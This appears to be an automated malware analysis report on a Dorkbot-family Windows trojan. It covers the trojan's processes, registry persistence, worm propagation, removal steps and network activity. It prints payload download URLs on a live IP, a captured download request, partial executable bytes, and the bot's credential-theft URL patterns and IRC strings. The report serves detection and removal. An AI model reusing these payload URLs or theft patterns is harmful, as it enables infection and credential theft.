HEUR:Trojan.Win32.Generic (Kaspersky), Trojan.GenericKD.1788241 (AdAware), Backdoor.Win32.Farfli.FD, Worm.Win32.Dorkbot.FD, mzpefinder_pcap_file.YR, WormDorkbot.YR, GenericUDPFlooder.YR, GenericIRCBot.YR, GenericMSNWorm.YR, GenericUSBInfector.YR, GenericDNSBlocker.YR, GenericDownloader.YR, GenericAutorunWorm.YR, GenericSYNFlooder.YR, GenericInjector.YR, BankerGeneric.YR, GenericProxy.YR, GenericPhysicalDrive0.YR (Lavasoft MAS)Behaviour: Banker, Trojan, Backdoor, Flooder, Worm, WormAutorun, IRCBot, MSNWorm, DNSBlocker, UDPFlooder, SYNFlooder, Trojan-Proxy, USBInfector
The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.
Summary
MD5: f55a0406f35164f2c0241f80119af195
SHA1: 48390c2104038a926ab4a76f0dbf14b8ff7c3ea6
SHA256: 4491e796d4c7558c5c01af17826cc26f1c5aeca2124bd7e6bca2bf8e15d25565
SSDeep: 3072:msvNBOlkH1W/mXMDIDJYv1cYHvxlRbovx7:lvVgxGYHbRUvZ
Size: 122880 bytes
File type: EXE
Platform: WIN32
Entropy: Not Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-08-01 20:53:33
Analyzed on: WindowsXP SP3 32-bit
Summary: Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).
Dynamic Analysis
Payload
| Behaviour | Description |
|---|---|
| WormAutorun | A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer. |
| IRCBot | A bot can communicate with command and control servers via IRC channel. |
| MSNWorm | A worm can spread its copies through the MSN Messanger. |
| DNSBlocker | A program can block designated DNS servers for making it difficult for users to locate specific domains or web sites on the Internet. |
| UDPFlooder | This program can make a UDP flood. A UDP flood attack is a denial-of-service attack using the User Datagram Protocol (UDP). It can be initiated by sending a large number of UDP packets to random ports on a remote host. |
| SYNFlooder | This program can make a SYN flood. It is a form of denial-of-service attack in which an attacker sends a succession of SYN requests to a target's system in an attempt to consume enough server resources to make the system unresponsive to legitimate traffic. |
| Trojan-Proxy | This program can launch a proxy server (SOCKS4) on a designated TCP port. |
| USBInfector | A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer. |
Process activity
The Trojan creates the following process(es):
%original file name%.exe:2892
yhtdayrg.exe:3644
ksaduytr.exe:3120
ksaduytr.exe:2096
The Trojan injects its code into the following process(es):
kusadtylds.exe:3336
calc.exe:2704
%original file name%.exe:3188
notepad.exe:3436
svchost.exe:3856
hsadjku.exe:972
svchost.exe:340
mscorsvw.exe:424
jqs.exe:480
csrss.exe:692
winlogon.exe:716
services.exe:760
svchost.exe:928
svchost.exe:1012
svchost.exe:1096
svchost.exe:1144
svchost.exe:1188
spoolsv.exe:1432
Explorer.EXE:1948
wmiprvse.exe:3704
Mutexes
The following mutexes were created/opened:
CTF.LBES.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003CTF.Compart.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003CTF.Asm.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003CTF.Layouts.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003CTF.TMD.MutexDefaultS-1-5-21-796845957-1563985344-1801674531-1003CTF.TimListCache.FMPDefaultS-1-5-21-796845957-1563985344-1801674531-1003MUTEX.DefaultS-1-5-21-796845957-1563985344-1801674531-1003_!MSFTHISTORY!_c:!documents and settings!adm!local settings!temporary internet files!content.ie5!c:!documents and settings!adm!cookies!c:!documents and settings!adm!local settings!history!history.ie5!WininetStartupMutexWininetProxyRegistryMutexWininetConnectionMutexRasPbFileZonesCounterMutex!IETld!MutexZoneAttributeCacheCounterMutexZonesCacheCounterMutexZonesLockedCacheCounterMutex-c1419a97Mutex
File activity
The process kusadtylds.exe:3336 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\wxajyh[1].asp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
The process %original file name%.exe:3188 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (2037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe (8408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yhtdayrg.exe (28676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\zpm[1].exe (12412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ng[1].exe (18569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bet[1].exe (33497 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (0 bytes)
The process yhtdayrg.exe:3644 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
The Trojan deletes the following file(s):
%Program Files%\Common Files\CreativeAudio\desktop.ini (0 bytes)
The process ksaduytr.exe:2096 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):
%Documents and Settings%\%current user%\Application Data\c731200 (673 bytes)
The Trojan deletes the following file(s):
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe.gonewiththewings (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe.gonewiththewings (0 bytes)
Registry activity
The process kusadtylds.exe:3336 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 82 F4 35 C4 7D 75 66 88 F0 95 D5 E5 7A 95 F5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 43 00 00 00 01 00 00 00 00 00 00 00"
[HKCU\Software\Microsoft\Windows\CurrentVersion]
"WireLMode" = "4D 94 B2 5A 22 C7 85 09 02 2C F8 E2 39 EE 72 7E"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
To automatically run itself each time Windows is booted, the Trojan adds the following link to its file to the system registry autorun key:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftStCnt" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process calc.exe:2704 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2C 12 7E FC DD 29 40 93 0B F0 2C 13 E4 9F C0 5A"
The process %original file name%.exe:3188 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "F5 BA 4C 3B 4F C6 FD A1 23 BE 03 5F 82 E3 6F FF"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"AutoDetect" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "46 00 00 00 41 00 00 00 01 00 00 00 00 00 00 00"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process %original file name%.exe:2892 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1406915613"
"Name" = "%original file name%.exe"
The process notepad.exe:3436 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1B 23 4E 03 9D 9A F8 5C 80 28 66 39 A3 15 30 93"
The process yhtdayrg.exe:3644 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "B6 AA 19 FB A6 15 E9 4F 3A 82 AC 94 89 FF 1B F3"
[HKCU\Software\Classes\CLSID\{2179B320-CEA1-A045-9594-6F24DF82DCD3}\0E7302EC\CG1]
"HAL" = "05 EE 00 00"
[HKCU\Software\Win7zip]
"uuid" = "21 79 B3 20 CE A1 A0 45 95 94 6F 24 DF 82 DC D3"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Startup" = "%Documents and Settings%\%current user%\Start Menu\Programs\Startup"
"My Video" = "%Documents and Settings%\%current user%\My Documents\My Videos"
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"
"My Music" = "%Documents and Settings%\%current user%\My Documents\My Music"
[HKCU\Software\Classes\CLSID\{2179B320-CEA1-A045-9594-6F24DF82DCD3}\0E7302EC\CG1]
"BID" = "20 00 08 00 05 00 08 00 DE 07 00 00 14 00 88 FF"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uwozkyfqm.exe]
"DisableExceptionChainValidation" = ""
The process ksaduytr.exe:3120 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "41 0F 82 F2 3D CB 3E 16 F4 29 BF F3 8F 96 EE 12"
The process ksaduytr.exe:2096 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "92 F0 AD EC 74 0E F6 E6 76 FB 97 65 2F 73 E6 45"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
Dropped PE files
| MD5 | File path |
|---|---|
| 9b8ae040cb97b1fbb840c8f0589c5da0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\kusadtylds.exe |
| 13ddc13257824f83a3527b60fd3ebed0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bet[1].exe |
| 9b8ae040cb97b1fbb840c8f0589c5da0 | c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\zpm[1].exe |
| 13ddc13257824f83a3527b60fd3ebed0 | c:\Program Files\Common Files\CreativeAudio\uwozkyfqm.exe |
HOSTS file anomalies
No changes have been detected.
Rootkit activity
No anomalies have been detected.
Propagation
A worm can spread via removable drives. It writes its executable and creates "autorun.inf" scripts on all removable drives. The autorun script will execute the Trojan's file once a user opens a drive's folder in Windows Explorer.A program can register a device notification with the help of RegisterDeviceNotification. So it is notified when a USB device is plugged and then the worm copies itself to the USB device plugged into the affected computer.A worm can spread its copies through the MSN Messanger.
Removals
Remove it with Ad-Aware
- Click (here) to download and install Ad-Aware Free Antivirus.
- Update the definition files.
- Run a full scan of your computer.
Manual removal*
- Terminate malicious process(es) (How to End a Process With the Task Manager):
%original file name%.exe:2892
yhtdayrg.exe:3644
ksaduytr.exe:3120
ksaduytr.exe:2096 - Delete the original Trojan file.
- Delete or disinfect the following files created/modified by the Trojan:
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\wxajyh[1].asp (36 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\SZIS9VJF\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\kusadtylds.exe (2037 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\ksaduytr.exe (8408 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\yhtdayrg.exe (28676 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\zpm[1].exe (12412 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\OVYHJBCC\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\3F9KLW6F\ng[1].exe (18569 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\1GGYBZUQ\bet[1].exe (33497 bytes)
%Documents and Settings%\%current user%\My Documents\My Videos\Desktop.ini (312 bytes)
%Documents and Settings%\%current user%\Application Data\c731200 (673 bytes) - Delete the following value(s) in the autorun key (How to Work with System Registry):
[HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
"MicrosoftStCnt" = "C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\kusadtylds.exe" - Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
- Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
- Reboot the computer.
Static Analysis
VersionInfo
Company Name:
Product Name:
Product Version:
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version:
File Description:
Comments:
Language: English (United States)
Company Name: Product Name: Product Version: Legal Copyright: Legal Trademarks: Original Filename: Internal Name: File Version: File Description: Comments: Language: English (United States)
PE Sections
| Name | Virtual Address | Virtual Size | Raw Size | Entropy | Section MD5 |
|---|---|---|---|---|---|
| .text | 4096 | 73529 | 73728 | 4.64967 | 91635d159f2b73914b6a6e2444dbd7e0 |
| .rdata | 77824 | 14294 | 14336 | 3.8912 | 674ba75542f8bf23f5b6eb3af118facb |
| .data | 94208 | 189160 | 14336 | 3.85561 | 7670f4636954fbd8da258eb5712d3f85 |
| .rsrc | 286720 | 19352 | 19456 | 4.95966 | a819c8305ac54fce7569f8f104ebb751 |
Dropped from:
Downloaded by:
Similar by SSDeep:
Similar by Lavasoft Polymorphic Checker:
Network Activity
URLs
| URL | IP |
|---|---|
| hxxp://54.191.185.232/bet.exe |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /bet.exe HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C; .NET4.0E)
Host: 54.191.185.232
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 10:40:01 GMT
Server: Apache/2.2.27 (Amazon)
Last-Modified: Tue, 05 Aug 2014 07:49:34 GMT
ETag: "41c43-39200-4ffdd18ba1561"
Accept-Ranges: bytes
Content-Length: 233984
Connection: close
Content-Type: application/octet-stream
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T.kE5.8E5.8E5.8.:.8G5.8LM]8U5.8LML8R5.8LMK8.5.8LM[8L5.8E5.8.5.8[gL8D5.8[g\8D5.8[gY8D5.8RichE5.8........................PE..L...n..S.............................C............@.............................................................................x....p..\b..............................................................@............................................text...D........................... ..`.rdata...$.......&..................@..@.data...@........p..................@....rsrc...\b...p...d..................@..@................................................................................................................................................................................................................................................................................................................................................................................U......E.8....E.B....E.;....E.K....E.=....E.....E..M. M..M..E...]...............U......E.G....E.8....E.G....E......E.;....E.T....E.P..$.@.Q..(.@.R.$.@.P.s$.......M}&..8.@. M...8.@...0.@...0.@...0.@.......4.@.P..4.@.Q.U.R.E.P..$.@.Q.4........4.@..4.@..U.R.E.P.M.Qj.j6..T.@...,.@. ...,.@.j.....@... .@.. .@..,.@...?.,.@...(.@.Q.U.R.0.@.P....@...8.@..8.@..M. .8.@..M..U. U..U..E...].....U.....V.E......E.Z....E.W....E.I....E.C....E........E.....E..}..........$.@. .0.@...$.@...,.@.R. .@.P..4.@.Q....@.....(.@.RjYj..
<<< skipped >>>
Map
The Trojan connects to the servers at the folowing location(s):
Strings from Dumps
%original file name%.exe_3188:
.text
.text
`.rdata
`.rdata
@.data
@.data
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetCPInfo
GetCPInfo
http://54.191.185.232/dqnew.exe
http://54.191.185.232/dqnew.exe
dw3re.exe
dw3re.exe
http://54.191.185.232/bnew.exe
http://54.191.185.232/bnew.exe
hsadjku.exe
hsadjku.exe
http://54.191.185.232/ng.exe
http://54.191.185.232/ng.exe
ksaduytr.exe
ksaduytr.exe
http://54.191.185.232/bet.exe
http://54.191.185.232/bet.exe
yhtdayrg.exe
yhtdayrg.exe
http://54.191.185.232/zpm.exe
http://54.191.185.232/zpm.exe
kusadtylds.exe
kusadtylds.exe
c:\%original file name%.exe
c:\%original file name%.exe
%original file name%.exe_3188_rwx_00400000_00009000:
.text
.text
`.rdata
`.rdata
@.data
@.data
__MSVCRT_HEAP_SELECT
__MSVCRT_HEAP_SELECT
user32.dll
user32.dll
WinExec
WinExec
KERNEL32.dll
KERNEL32.dll
ADVAPI32.dll
ADVAPI32.dll
SHELL32.dll
SHELL32.dll
URLDownloadToFileA
URLDownloadToFileA
urlmon.dll
urlmon.dll
GetCPInfo
GetCPInfo
http://54.191.185.232/dqnew.exe
http://54.191.185.232/dqnew.exe
dw3re.exe
dw3re.exe
http://54.191.185.232/bnew.exe
http://54.191.185.232/bnew.exe
hsadjku.exe
hsadjku.exe
http://54.191.185.232/ng.exe
http://54.191.185.232/ng.exe
ksaduytr.exe
ksaduytr.exe
http://54.191.185.232/bet.exe
http://54.191.185.232/bet.exe
yhtdayrg.exe
yhtdayrg.exe
http://54.191.185.232/zpm.exe
http://54.191.185.232/zpm.exe
kusadtylds.exe
kusadtylds.exe
c:\%original file name%.exe
c:\%original file name%.exe
%original file name%.exe_3188_rwx_01050000_0004E000:
.text
.text
`.rdata
`.rdata
@.data
@.data
.reloc
.reloc
=MSG t
=MSG t
>MSG u`
>MSG u`
=PASS
=PASS
8httpu1
8httpu1
8httpuM
8httpuM
tlSSSSSSSSSShL0
tlSSSSSSSSSShL0
%s.%s
%s.%s
%s.%S
%s.%S
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%s" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
%s.Blocked "%S" from removing our bot file!
i.root-servers.org
i.root-servers.org
%s.Blocked "%s" from moving our bot file
%s.Blocked "%s" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.Blocked "%S" from moving our bot file
%s.p10-> Message hijacked!
%s.p10-> Message hijacked!
%s.p10-> Message to %s hijacked!
%s.p10-> Message to %s hijacked!
%s.p21-> Message hijacked!
%s.p21-> Message hijacked!
msnmsg
msnmsg
CAL %d %6s
CAL %d %6s
ngr->blocksize: %d
ngr->blocksize: %d
block_size: %d
block_size: %d
\\.\pipe\%s
\\.\pipe\%s
kernel32.dll
kernel32.dll
%s_%d
%s_%d
-%sMutex
-%sMutex
ntdll.dll
ntdll.dll
%s-pid
%s-pid
%s-comm
%s-comm
JOIN #
JOIN #
PRIVMSG #
PRIVMSG #
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S"
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Blocked "%S" from creating "%S" - "%s" will be removed at reboot!
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d.
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
%s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).
PRIVMSG %5s
PRIVMSG %5s
JOIN %5s
JOIN %5s
PRIVMSG
PRIVMSG
JOIN
JOIN
%s:%d
%s:%d
%s.%s%s
%s.%s%s
%S%s%s
%S%s%s
%s.%S%S
%s.%S%S
%S%S%S
%S%S%S
state_%s
state_%s
%s.%s (p='%S')
%s.%s (p='%S')
pop3://%s:%s@%s:%d
pop3://%s:%s@%s:%d
%s:%s@%s:%d
%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftp://%s:%s@%s:%d
ftpgrab
ftpgrab
%s.%s ->> %s (%s : %s)
%s.%s ->> %s (%s : %s)
%s.%s ->> %s : %s
%s.%s ->> %s : %s
%s-%s-%s
%s-%s-%s
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%s'
%s.Blocked possible browser exploit pack call on URL '%S'
%s.Blocked possible browser exploit pack call on URL '%S'
webroot.
webroot.
virusbuster.nprotect.
virusbuster.nprotect.
heck.tc
heck.tc
onecare.live.
onecare.live.
login[password]
login[password]
login[username]
login[username]
*members*.iknowthatgirl*/members*
*members*.iknowthatgirl*/members*
*youporn.*/login*
*youporn.*/login*
*members.brazzers.com*
*members.brazzers.com*
*bcointernacional*login*
*bcointernacional*login*
*:2222/CMD_LOGIN*
*:2222/CMD_LOGIN*
*whcms*dologin*
*whcms*dologin*
*:2086/login*
*:2086/login*
*:2083/login*
*:2083/login*
*:2082/login*
*:2082/login*
*webnames.ru/*user_login*
*webnames.ru/*user_login*
Webnames
Webnames
*dotster.com/*login*
*dotster.com/*login*
loginid
loginid
*enom.com/login*
*enom.com/login*
login.Pass
login.Pass
login.User
login.User
*login.Pass=*
*login.Pass=*
*1and1.com/xml/config*
*1and1.com/xml/config*
*moniker.com/*Login*
*moniker.com/*Login*
LoginPassword
LoginPassword
LoginUserName
LoginUserName
*LoginPassword=*
*LoginPassword=*
*namecheap.com/*login*
*namecheap.com/*login*
loginname
loginname
*godaddy.com/login*
*godaddy.com/login*
Password
Password
*Password=*
*Password=*
*alertpay.com/login*
*alertpay.com/login*
*netflix.com/*ogin*
*netflix.com/*ogin*
*thepiratebay.org/login*
*thepiratebay.org/login*
*torrentleech.org/*login*
*torrentleech.org/*login*
*vip-file.com/*/signin-do*
*vip-file.com/*/signin-do*
*sms4file.com/*/signin-do*
*sms4file.com/*/signin-do*
*letitbit.net*
*letitbit.net*
*what.cd/login*
*what.cd/login*
*oron.com/login*
*oron.com/login*
*filesonic.com/*login*
*filesonic.com/*login*
*speedyshare.com/login*
*speedyshare.com/login*
*uploaded.to/*login*
*uploaded.to/*login*
*uploading.com/*login*
*uploading.com/*login*
loginUserPassword
loginUserPassword
loginUserName
loginUserName
*loginUserPassword=*
*loginUserPassword=*
*fileserv.com/login*
*fileserv.com/login*
*hotfile.com/login*
*hotfile.com/login*
*4shared.com/login*
*4shared.com/login*
txtpass
txtpass
*txtpass=*
*txtpass=*
*netload.in/index*
*netload.in/index*
*freakshare.com/login*
*freakshare.com/login*
login_pass
login_pass
*login_pass=*
*login_pass=*
*mediafire.com/*login*
*mediafire.com/*login*
*sendspace.com/login*
*sendspace.com/login*
*megaupload.*/*login*
*megaupload.*/*login*
*depositfiles.*/*/login*
*depositfiles.*/*/login*
*signin.ebay*SignIn
*signin.ebay*SignIn
*officebanking.cl/*login.asp*
*officebanking.cl/*login.asp*
*secure.logmein.*/*logincheck*
*secure.logmein.*/*logincheck*
session[password]
session[password]
*password]=*
*password]=*
*twitter.com/sessions
*twitter.com/sessions
txtPassword
txtPassword
*&txtPassword=*
*&txtPassword=*
*.moneybookers.*/*login.pl
*.moneybookers.*/*login.pl
*runescape*/*weblogin*
*runescape*/*weblogin*
*&password=*
*&password=*
*no-ip*/login*
*no-ip*/login*
*steampowered*/login*
*steampowered*/login*
quick_password
quick_password
*hackforums.*/member.php
*hackforums.*/member.php
*facebook.*/login.php*
*facebook.*/login.php*
*login.yahoo.*/*login*
*login.yahoo.*/*login*
passwd
passwd
login
login
*passwd=*
*passwd=*
*login.live.*/*post.srf*
*login.live.*/*post.srf*
TextfieldPassword
TextfieldPassword
*TextfieldPassword=*
*TextfieldPassword=*
*gmx.*/*FormLogin*
*gmx.*/*FormLogin*
*Passwd=*
*Passwd=*
FLN-Password
FLN-Password
*FLN-Password=*
*FLN-Password=*
*pass=*
*pass=*
*bigstring.*/*index.php*
*bigstring.*/*index.php*
*screenname.aol.*/login.psp*
*screenname.aol.*/login.psp*
password
password
loginId
loginId
*password=*
*password=*
*aol.*/*login.psp*
*aol.*/*login.psp*
Passwd
Passwd
*google.*/*ServiceLoginAuth*
*google.*/*ServiceLoginAuth*
login_password
login_password
login_email
login_email
*login_password=*
*login_password=*
*paypal.*/webscr?cmd=_login-submit*
*paypal.*/webscr?cmd=_login-submit*
%s / ?%d HTTP/1.1
%s / ?%d HTTP/1.1
Host: %s
Host: %s
User-Agent: %s
User-Agent: %s
Mozilla/4.0
Mozilla/4.0
\\.\PHYSICALDRIVE0
\\.\PHYSICALDRIVE0
shell32.dll
shell32.dll
httpi
httpi
dnsapi.dll
dnsapi.dll
http://%s/%s
http://%s/%s
http://%s/
http://%s/
POST /23s
POST /23s
[%s{%s%s{%s
[%s{%s%s{%s
n%s[%s{%s%s{%s
n%s[%s{%s%s{%s
%s[%s{%s
%s[%s{%s
[DNS]: Redirecting "%s" to "%s"
[DNS]: Redirecting "%s" to "%s"
%s|%s
%s|%s
[Logins]: Cleared %d logins
[Logins]: Cleared %d logins
FTP ->
FTP ->
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
[d="%s" s="%d bytes"] Download error: MD5 mismatch (%s != %s)
http://
http://
[Login]: %s
[Login]: %s
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[DNS]: Blocked %d domain(s) - Redirected %d domain(s)
[Speed]: Estimated upload speed %d KB/s
[Speed]: Estimated upload speed %d KB/s
Software\Microsoft\Windows\CurrentVersion\Run
Software\Microsoft\Windows\CurrentVersion\Run
\\.\%c:
\\.\%c:
*bebo.*/c/profile/comment_post.json
*bebo.*/c/profile/comment_post.json
*bebo.*/mail/MailCompose.jsp*
*bebo.*/mail/MailCompose.jsp*
*friendster.*/sendmessage.php*
*friendster.*/sendmessage.php*
*friendster.*/rpc.php
*friendster.*/rpc.php
*vkontakte.ru/mail.php
*vkontakte.ru/mail.php
*vkontakte.ru/wall.php
*vkontakte.ru/wall.php
*vkontakte.ru/api.php
